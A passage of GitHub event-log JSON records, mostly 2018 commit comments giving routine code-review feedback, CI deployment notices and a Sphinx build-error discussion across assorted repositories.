dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L18F1\" staff=\"1\" startid=\"#note-L18F1\" accidupper=\"n\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L19\">\r\n                            <staff xml:id=\"staff-L19F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L19F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L20F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L20F1\" staff=\"1\" startid=\"#note-L20F1\" accidupper=\"f\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L21\" right=\"end\">\r\n                            <staff xml:id=\"staff-L21F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L21F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L23F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L23F1\" staff=\"1\" startid=\"#note-L23F1\" />\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2018-07-21T11:56:04Z"}
{"id":"7998498013","type":"CommitCommentEvent","actor":{"login":"petschki"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":29788338,"position":null,"line":null,"path":null,"commit_id":"7d6038ee3e80405f92d516394dc2d199d64ca6cb","created_at":"2018-07-21T11:56:56Z","updated_at":"2018-07-21T11:56:56Z","author_association":"MEMBER","body":"What @jensens told me is to keep mosaic versions and buildout.coredev versions.cfg in Sync. At least 5.1 branch has this already. Where is this old Pin?"}},"created_at":"2018-07-21T11:56:56Z"}
{"id":"7998498025","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788339,"position":null,"line":null,"path":null,"commit_id":"e2df96e49371564cb6adc4d69608da6011fecd04","created_at":"2018-07-21T11:56:56Z","updated_at":"2018-07-21T11:56:56Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-11](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-11-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T11:56:56Z"}
{"id":"7998498945","type":"CommitCommentEvent","actor":{"login":"AtaMuhiuldin"},"repo":{"name":"AtaMuhiuldin/NODE"},"payload":{"comment":{"id":29788340,"position":null,"line":null,"path":null,"commit_id":"c34c3332a63e9f69de7db54067447b7d303c58c3","created_at":"2018-07-21T11:57:46Z","updated_at":"2018-07-21T11:57:46Z","author_association":"OWNER","body":"ok "}},"created_at":"2018-07-21T11:57:46Z"}
{"id":"7998500010","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788344,"position":null,"line":null,"path":null,"commit_id":"3036726a9783bb953ddf1b7b9a62f2c27d0db7b3","created_at":"2018-07-21T11:58:48Z","updated_at":"2018-07-21T11:58:48Z","author_association":"CONTRIBUTOR","body":"Hey, when you are adding public API and telling someone it's there, it's not a decision you could easily fix later! Just don't do that, when there exists another workaround even though it's maybe \"less nice\".\r\n"}},"created_at":"2018-07-21T11:58:48Z"}
{"id":"7998502908","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788354,"position":null,"line":null,"path":null,"commit_id":"e2df96e49371564cb6adc4d69608da6011fecd04","created_at":"2018-07-21T12:01:08Z","updated_at":"2018-07-21T12:01:08Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-13](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-13).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-13-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T12:01:08Z"}
{"id":"7998505895","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29788364,"position":5,"line":343,"path":"src/model.ts","commit_id":"3feb9cf9f65537abc7e24dfed418e4b5645ee490","created_at":"2018-07-21T12:03:29Z","updated_at":"2018-07-21T12:03:29Z","author_association":"MEMBER","body":"You have to notify the `modelListeners` manually, otherwise the model won't be initialized.\r\n\r\nI suggest you take a look at https://github.com/bs-community/skinview3d/commit/df3be7ab5108ed424eec9390ecc44837e9dade93. The listeners in `modelListeners` are notified when the `slim` property is changed, and they will update the model."}},"created_at":"2018-07-21T12:03:29Z"}
{"id":"7998506471","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29788366,"position":5,"line":210,"path":"kernel/prf.c","commit_id":"958a7ef8c686c4f2d0181bf3303af247895d7cd0","created_at":"2018-07-21T12:03:54Z","updated_at":"2018-07-21T12:03:54Z","author_association":"OWNER","body":"Thanks, force-pushed.\r\nThey actually don't do anything at all,\r\nbut you are right, better safe than sorry."}},"created_at":"2018-07-21T12:03:54Z"}
{"id":"7998507194","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29788368,"position":null,"line":null,"path":null,"commit_id":"958a7ef8c686c4f2d0181bf3303af247895d7cd0","created_at":"2018-07-21T12:04:25Z","updated_at":"2018-07-21T12:04:25Z","author_association":"OWNER","body":"> I guess I should have said I was working on _vsnprintf(), but no matter :-)\r\n\r\nCool, any ETA to this work?"}},"created_at":"2018-07-21T12:04:25Z"}
{"id":"7998511717","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788377,"position":null,"line":null,"path":null,"commit_id":"51665c86d588d577099fb23f67ee9bf958f44963","created_at":"2018-07-21T12:07:43Z","updated_at":"2018-07-21T12:07:43Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-15](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-15).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-15-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T12:07:43Z"}
{"id":"7998512887","type":"CommitCommentEvent","actor":{"login":"andrewbird"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29788379,"position":null,"line":null,"path":null,"commit_id":"958a7ef8c686c4f2d0181bf3303af247895d7cd0","created_at":"2018-07-21T12:08:35Z","updated_at":"2018-07-21T12:08:35Z","author_association":"NONE","body":"Mmm, I'm having some difficulty trying to kill the charp global etc. Much more invasive than your fix. I was trying to get the self test to compile and that was proving quite hard. Anyway if you've fixed the problem I'll fiddle away in the background."}},"created_at":"2018-07-21T12:08:35Z"}
{"id":"7998513535","type":"CommitCommentEvent","actor":{"login":"luxianyou"},"repo":{"name":"superbitcoin/SuperBitcoin"},"payload":{"comment":{"id":29788380,"position":null,"line":null,"path":null,"commit_id":"94097096b3e2c2934e99ac05a7e218776651eb1a","created_at":"2018-07-21T12:09:08Z","updated_at":"2018-07-21T12:09:08Z","author_association":"NONE","body":"把挖矿的删了就有用了么，不好意思，我们不承认不能挖矿的傻逼套餐，3个月后，我们团队自己分叉傻逼套餐挖矿"}},"created_at":"2018-07-21T12:09:08Z"}
{"id":"7998514957","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29788386,"position":75,"line":425,"path":"wcfsetup/install/files/lib/system/package/PackageUpdateDispatcher.class.php","commit_id":"d9aed3c6fad41901b01506f735322b750a2f9afa","created_at":"2018-07-21T12:10:15Z","updated_at":"2018-07-21T12:10:15Z","author_association":"CONTRIBUTOR","body":"You probably meant `continue 2;` here, don't you @dtdesign ?"}},"created_at":"2018-07-21T12:10:15Z"}
{"id":"7998515930","type":"CommitCommentEvent","actor":{"login":"girdharirayak"},"repo":{"name":"girdharirayak/helloworld"},"payload":{"comment":{"id":29788387,"position":null,"line":null,"path":null,"commit_id":"ea1d0c2dda6d130f9fee3b25189adddb18354bdf","created_at":"2018-07-21T12:11:02Z","updated_at":"2018-07-21T12:11:02Z","author_association":"OWNER","body":"lkj"}},"created_at":"2018-07-21T12:11:02Z"}
{"id":"7998517384","type":"CommitCommentEvent","actor":{"login":"blackninja9939"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29788391,"position":1227,"line":814,"path":"The_Seven_Kingdoms/common/laws/succession_laws.txt","commit_id":"aedf2135c6befe42190963415e8a2857e44abc16","created_at":"2018-07-21T12:12:13Z","updated_at":"2018-07-21T12:12:13Z","author_association":"COLLABORATOR","body":"You know it makes it reallllly easy to see when you just copy parts of AGOT when you flat out leave in the wrong stuff that you took from us but did not change properly. Looking at you NW_government because the one in your game is called nights_watch_government.\r\n\r\nOh and speaking of government files you've got that line in military_command_government about the de_facto_empire variable, last I checked you didn't have a mega war system so that looks like more bad copy paste.\r\n\r\n@Vierwood @Altemio "}},"created_at":"2018-07-21T12:12:13Z"}
{"id":"7998517608","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29788393,"position":55,"line":58,"path":"OpenRobertaParent/OpenRobertaDesktopApp/src/main/java/de/fhg/iais/DesktopApp.java","commit_id":"38fbb117b40004d867af683a3b628356173ce908","created_at":"2018-07-21T12:12:24Z","updated_at":"2018-07-21T12:12:24Z","author_association":"NONE","body":"on the naming side - the dot notation suggests grouping. Above for server.port and and server.staticresources.dir you can imagine a filesystem:\r\n```\r\nserver/\r\n  port = 1234\r\n  staticresources/\r\n    dir = \"some/path/to/files\"\r\n```\r\nSo for the single-user-mode it would be better to not a have a '.' as 'single' is not a meaningful group. Just call it \"singleuser\"."}},"created_at":"2018-07-21T12:12:24Z"}
{"id":"7998517622","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29788394,"position":null,"line":null,"path":null,"commit_id":"958a7ef8c686c4f2d0181bf3303af247895d7cd0","created_at":"2018-07-21T12:12:25Z","updated_at":"2018-07-21T12:12:25Z","author_association":"OWNER","body":"There is still no `_snprintf()/_vsnprintf()`.\r\nI only fixed this problem:\r\n```\r\nMmm, not sure how I can do this without either a FreeDOS _vsprintf() or gnu extension __builtin_va_arg_pack() any ideas?\r\n```"}},"created_at":"2018-07-21T12:12:25Z"}
{"id":"7998517779","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29788397,"position":14,"line":77,"path":"src/main/java/com/ewp/crm/controllers/rest/IPTelephonyRestController.java","commit_id":"9e16a13879a7f6ccbfad012d57925f476ec57a20","created_at":"2018-07-21T12:12:32Z","updated_at":"2018-07-21T12:12:32Z","author_association":"NONE","body":"написать комментарий над ними"}},"created_at":"2018-07-21T12:12:32Z"}
{"id":"7998517963","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29788399,"position":27,"line":90,"path":"src/main/java/com/ewp/crm/controllers/rest/IPTelephonyRestController.java","commit_id":"9e16a13879a7f6ccbfad012d57925f476ec57a20","created_at":"2018-07-21T12:12:41Z","updated_at":"2018-07-21T12:12:41Z","author_association":"NONE","body":"обработка исключения"}},"created_at":"2018-07-21T12:12:41Z"}
{"id":"7998518348","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29788404,"position":7,"line":7,"path":"src/main/java/com/ewp/crm/repository/interfaces/CallRecordRepository.java","commit_id":"9e16a13879a7f6ccbfad012d57925f476ec57a20","created_at":"2018-07-21T12:13:00Z","updated_at":"2018-07-21T12:13:00Z","author_association":"NONE","body":"аналогично должен быть коммент"}},"created_at":"2018-07-21T12:13:00Z"}
{"id":"7998518451","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29788405,"position":7,"line":7,"path":"src/main/java/com/ewp/crm/repository/interfaces/CallRecordRepository.java","commit_id":"9e16a13879a7f6ccbfad012d57925f476ec57a20","created_at":"2018-07-21T12:13:05Z","updated_at":"2018-07-21T12:13:05Z","author_association":"NONE","body":"или удалить"}},"created_at":"2018-07-21T12:13:05Z"}
{"id":"7998518873","type":"CommitCommentEvent","actor":{"login":"Hacksore"},"repo":{"name":"bs-community/skinview3d"},"payload":{"comment":{"id":29788407,"position":13,"line":351,"path":"src/model.ts","commit_id":"3feb9cf9f65537abc7e24dfed418e4b5645ee490","created_at":"2018-07-21T12:13:27Z","updated_at":"2018-07-21T12:13:27Z","author_association":"COLLABORATOR","body":"@yushijinhun it was in the move to TS that we no longer need to do this check. "}},"created_at":"2018-07-21T12:13:27Z"}
{"id":"7998519369","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788408,"position":8,"line":8,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:13:54Z","updated_at":"2018-07-21T12:13:54Z","author_association":"NONE","body":"Выносить в .css"}},"created_at":"2018-07-21T12:13:54Z"}
{"id":"7998520014","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788410,"position":11,"line":11,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:14:27Z","updated_at":"2018-07-21T12:14:27Z","author_association":"NONE","body":"Поставь \r\nWebStorm\r\nIntellij Idea"}},"created_at":"2018-07-21T12:14:27Z"}
{"id":"7998521155","type":"CommitCommentEvent","actor":{"login":"aschlosberg"},"repo":{"name":"aschlosberg/BNoL"},"payload":{"comment":{"id":29788412,"position":null,"line":null,"path":null,"commit_id":"36036044abbbb292688aa887d2fac399f3c644b4","created_at":"2018-07-21T12:15:27Z","updated_at":"2018-07-21T12:15:27Z","author_association":"OWNER","body":"Hi Moritz\n\nSorry I missed your email. Unfortunately that was a couple of years ago and\nI think even back then I wasn't entirely convinced that I'd arrived at a\nproper solution as much as stumbled across something that worked.\n\nArran\n\nOn 15 June 2018 at 21:22, Moritz Milde <notifications@github.com> wrote:\n\n> Hey I found your post at\n> http://blog.rtwilson.com/how-to-make-your-sphinx-\n> documentation-compile-with-readthedocs-when-youre-using-numpy-and-scipy/\n>\n> When I try to follow your suggestions I get the following error after\n> adding mock to my conf.py:\n> *Locally*\n>\n> make html\n> Running Sphinx v1.3.6\n> making output directory...\n>\n> Exception occurred:\n>   File \"/usr/local/lib/python3.5/dist-packages/pygments/lexer.py\", line 501, in _process_state\n>     (tdef[0], state, cls, err))\n> ValueError: uncompilable regex <pygments.lexer.words object at 0x7fe7aaaedeb8> in state 'magicfuncs' of <class 'pygments.lexers.python.PythonLexer'>: 'Mock' object is not iterable\n> The full traceback has been saved in /tmp/sphinx-err-b8lpuqs1.log, if you want to report the issue to the developers.\n> Please also report this if it was a user error, so that a better error message can be provided next time.\n> A bug report can be filed in the tracker at <https://github.com/sphinx-doc/sphinx/issues>. Thanks!\n>\n> *RTD Online*\n>\n> Running Sphinx v1.7.4\n> loading translations [en]... done\n>\n> Traceback (most recent call last):\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 498, in _process_state\n>     rex = cls._process_regex(tdef[0], rflags, state)\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 426, in _process_regex\n>     regex = regex.get()\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 414, in get\n>     return regex_opt(self.words, prefix=self.prefix, suffix=self.suffix)\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/regexopt.py\", line 92, in regex_opt\n>     return prefix + regex_opt_inner(strings, '(') + suffix\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/regexopt.py\", line 80, in regex_opt_inner\n>     + close_paren\n> TypeError: 'Mock' object is not iterable\n>\n> During handling of the above exception, another exception occurred:\n>\n> Traceback (most recent call last):\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/cmdline.py\", line 303, in main\n>     args.warningiserror, args.tags, args.verbosity, args.jobs)\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/application.py\", line 187, in __init__\n>     self.setup_extension(extension)\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/application.py\", line 411, in setup_extension\n>     self.registry.load_extension(self, extname)\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/registry.py\", line 315, in load_extension\n>     mod = __import__(extname, None, None, ['setup'])\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/builders/applehelp.py\", line 20, in <module>\n>     from sphinx.builders.html import StandaloneHTMLBuilder\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/builders/html.py\", line 39, in <module>\n>     from sphinx.highlighting import PygmentsBridge\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/sphinx/highlighting.py\", line 39, in <module>\n>     python = PythonLexer(stripnl=False),\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 580, in __call__\n>     cls._tokens = cls.process_tokendef('', cls.get_tokendefs())\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 519, in process_tokendef\n>     cls._process_state(tokendefs, processed, state)\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 501, in _process_state\n>     (tdef[0], state, cls, err))\n> ValueError: uncompilable regex <pygments.lexer.words object at 0x7fc9b5db5710> in state 'keywords' of <class 'pygments.lexers.python.PythonLexer'>: 'Mock' object is not iterable\n>\n> Exception occurred:\n>   File \"/home/docs/checkouts/readthedocs.org/user_builds/teili/envs/latest/lib/python3.5/site-packages/pygments/lexer.py\", line 501, in _process_state\n>     (tdef[0], state, cls, err))\n> ValueError: uncompilable regex <pygments.lexer.words object at 0x7fc9b5db5710> in state 'keywords' of <class 'pygments.lexers.python.PythonLexer'>: 'Mock' object is not iterable\n> The full traceback has been saved in /tmp/sphinx-err-dso0c1qd.log, if you want to report the issue to the developers.\n> Please also report this if it was a user error, so that a better error message can be provided next time.\n> A bug report can be filed in the tracker at <https://github.com/sphinx-doc/sphinx/issues>. Thanks!\n>\n> Any idea why your solution fails for me?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/aschlosberg/BNoL/commit/36036044abbbb292688aa887d2fac399f3c644b4#commitcomment-29377990>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAfvDHfsmWE31pBpbwfv_OKKkmdBLEjoks5t85j-gaJpZM4UpaQ4>\n> .\n>\n\n\n\n-- \nw. www.arranschlosberg.com\ne. me@arranschlosberg.com\np. +61 402 767 627\n"}},"created_at":"2018-07-21T12:15:27Z"}
{"id":"7998521542","type":"CommitCommentEvent","actor":{"login":"rishabhdeepsingh"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29788413,"position":55,"line":58,"path":"OpenRobertaParent/OpenRobertaDesktopApp/src/main/java/de/fhg/iais/DesktopApp.java","commit_id":"38fbb117b40004d867af683a3b628356173ce908","created_at":"2018-07-21T12:15:47Z","updated_at":"2018-07-21T12:15:47Z","author_association":"OWNER","body":"what about server.user=\"default\" or server.user=\"single\" ?"}},"created_at":"2018-07-21T12:15:47Z"}
{"id":"7998521592","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788414,"position":29,"line":29,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:15:49Z","updated_at":"2018-07-21T12:15:49Z","author_association":"NONE","body":"skill-box"}},"created_at":"2018-07-21T12:15:49Z"}
{"id":"7998521754","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788415,"position":36,"line":36,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:15:57Z","updated_at":"2018-07-21T12:15:57Z","author_association":"NONE","body":"text-box"}},"created_at":"2018-07-21T12:15:57Z"}
{"id":"7998523420","type":"CommitCommentEvent","actor":{"login":"didhiy"},"repo":{"name":"polesapart/android_kernel_wingtech_msm8916"},"payload":{"comment":{"id":29788418,"position":null,"line":null,"path":null,"commit_id":"da462e9cdcb81013874eb94c3fb1c77e1fcdd039","created_at":"2018-07-21T12:17:12Z","updated_at":"2018-07-21T12:17:12Z","author_association":"NONE","body":"This commit should be revert to make zram working\r\n\r\n\r\n"}},"created_at":"2018-07-21T12:17:12Z"}
{"id":"7998524318","type":"CommitCommentEvent","actor":{"login":"fredkklm"},"repo":{"name":"fredkklm/blog"},"payload":{"comment":{"id":29788419,"position":null,"line":null,"path":null,"commit_id":"c39163ac0a1ad16eb265afd08aaa5765b9437297","created_at":"2018-07-21T12:17:58Z","updated_at":"2018-07-21T12:17:58Z","author_association":"OWNER","body":"create talk about language"}},"created_at":"2018-07-21T12:17:58Z"}
{"id":"7998524352","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29788420,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T12:17:59Z","updated_at":"2018-07-21T12:17:59Z","author_association":"NONE","body":"`Playoutvalue `should have the score always from the viewpoint of one side but your code switches sides (so you missing a minus sign at line 531 an 540).\r\nI would take the viewpoint of the side for which playout is called. then following code is correct:\r\nline 531: `playoutValue = - ::search<NonPV>(rootPos, ss+1, - playoutValue,  - playoutValue + 1, newDepth, true);`\r\nline 540: `playoutValue = - playout(ttMove, ss+1);`\r\n\r\n"}},"created_at":"2018-07-21T12:17:59Z"}
{"id":"7998524607","type":"CommitCommentEvent","actor":{"login":"Pikachu15103123"},"repo":{"name":"Pikachu15103123/DurantTest"},"payload":{"comment":{"id":29788421,"position":null,"line":null,"path":null,"commit_id":"5075ed8d4ce97c6e98f4352301adaa173c6f5e70","created_at":"2018-07-21T12:18:13Z","updated_at":"2018-07-21T12:18:13Z","author_association":"OWNER","body":"ok see it"}},"created_at":"2018-07-21T12:18:13Z"}
{"id":"7998525228","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788422,"position":70,"line":70,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:18:45Z","updated_at":"2018-07-21T12:18:45Z","author_association":"NONE","body":"<div class=\"photo\" />"}},"created_at":"2018-07-21T12:18:45Z"}
{"id":"7998526429","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788424,"position":74,"line":74,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:19:48Z","updated_at":"2018-07-21T12:19:48Z","author_association":"NONE","body":"br используется для переноса текста.\r\nЕсли хочешь сделать отступ, используй margin"}},"created_at":"2018-07-21T12:19:48Z"}
{"id":"7998526901","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788425,"position":81,"line":81,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:20:11Z","updated_at":"2018-07-21T12:20:11Z","author_association":"NONE","body":"margin-bottom: 10px;"}},"created_at":"2018-07-21T12:20:11Z"}
{"id":"7998527517","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788426,"position":3,"line":3,"path":"js/init.js","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:20:41Z","updated_at":"2018-07-21T12:20:41Z","author_association":"NONE","body":"slider1 -> slider"}},"created_at":"2018-07-21T12:20:41Z"}
{"id":"7998527657","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788428,"position":null,"line":null,"path":null,"commit_id":"5ab2608873d7f0411d8cedac1782295de391da9e","created_at":"2018-07-21T12:20:48Z","updated_at":"2018-07-21T12:20:48Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-16](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-16).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-16-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T12:20:48Z"}
{"id":"7998528469","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788429,"position":5,"line":5,"path":"js/init.js","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:21:27Z","updated_at":"2018-07-21T12:21:27Z","author_association":"NONE","body":"Это не нужно"}},"created_at":"2018-07-21T12:21:27Z"}
{"id":"7998528749","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788433,"position":14,"line":14,"path":"js/init.js","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:21:44Z","updated_at":"2018-07-21T12:21:44Z","author_association":"NONE","body":"Это не нужно"}},"created_at":"2018-07-21T12:21:44Z"}
{"id":"7998529152","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788434,"position":83,"line":83,"path":"index.html","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:22:05Z","updated_at":"2018-07-21T12:22:05Z","author_association":"NONE","body":"удали отсюда класс slider1."}},"created_at":"2018-07-21T12:22:05Z"}
{"id":"7998529620","type":"CommitCommentEvent","actor":{"login":"dgibbs64"},"repo":{"name":"GameServerManagers/LinuxGSM"},"payload":{"comment":{"id":29788435,"position":null,"line":null,"path":null,"commit_id":"1a20656197bf766413c42e37f1a4adf2097fd5bf","created_at":"2018-07-21T12:22:27Z","updated_at":"2018-07-21T12:22:27Z","author_association":"MEMBER","body":"resolves #1846 "}},"created_at":"2018-07-21T12:22:27Z"}
{"id":"7998538837","type":"CommitCommentEvent","actor":{"login":"karsasmus"},"repo":{"name":"Leafpub/leafpub"},"payload":{"comment":{"id":29788459,"position":null,"line":null,"path":null,"commit_id":"04633cad2ed93da0965897d915dba59a5124a2bc","created_at":"2018-07-21T12:30:00Z","updated_at":"2018-07-21T12:30:00Z","author_association":"CONTRIBUTOR","body":"@siggi2git jetzt schon 😃 \r\n[last commit](https://github.com/Leafpub/leafpub/commit/c0f0d6cdc36d97117949be50864f87070bb63e6e)"}},"created_at":"2018-07-21T12:30:00Z"}
{"id":"7998539709","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29788465,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T12:30:38Z","updated_at":"2018-07-21T12:30:38Z","author_association":"NONE","body":"To be exactly your current code works because you doesn't use playoutvalue after the line 531 anymore (the return value is never used, and in the condition abs(playoutvalue) the sign is ignored). But my version is more clear, logical and more robust to programming errors because always the same viewpoint is used."}},"created_at":"2018-07-21T12:30:38Z"}
{"id":"7998539729","type":"CommitCommentEvent","actor":{"login":"Adnatull"},"repo":{"name":"Adnatull/Elixir-Hackerrank-Solutions"},"payload":{"comment":{"id":29788466,"position":null,"line":null,"path":null,"commit_id":"964d25c2f1582e2d9ed53f2aaa546352d429e79d","created_at":"2018-07-21T12:30:39Z","updated_at":"2018-07-21T12:30:39Z","author_association":"OWNER","body":"Details can be found here \r\nhttps://elixir-lang.org/getting-started/binaries-strings-and-char-lists.html#charlists"}},"created_at":"2018-07-21T12:30:39Z"}
